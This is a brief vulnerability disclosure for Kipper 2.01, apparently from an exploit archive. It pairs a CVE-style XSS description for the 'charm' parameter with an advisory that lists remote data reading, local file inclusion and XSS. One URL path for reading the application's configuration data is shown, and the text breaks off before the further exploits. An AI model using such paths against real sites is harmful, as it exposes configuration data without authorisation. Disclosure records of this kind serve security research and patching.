Cross-site scripting (XSS) vulnerability in default.php in Kipper 2.01 allows remote malicious users to inject arbitrary web script or HTML via the charm parameter.
# Kipper 201 Multiple Vulnes ( Remote Data Reading , Local File Include , Remote XSS )
# Download From : wwwbookelvescom/kipper/files/kipper20zip
- Found By : RoMaNcYxHaCkEr
- My Site : WwWSec-CodeCoM
- My Group : Security - Codes Group
# Exploit [1]:
- Remote Data Reading :
localhost/kipper20/job/configdata
# Exploit [2] ...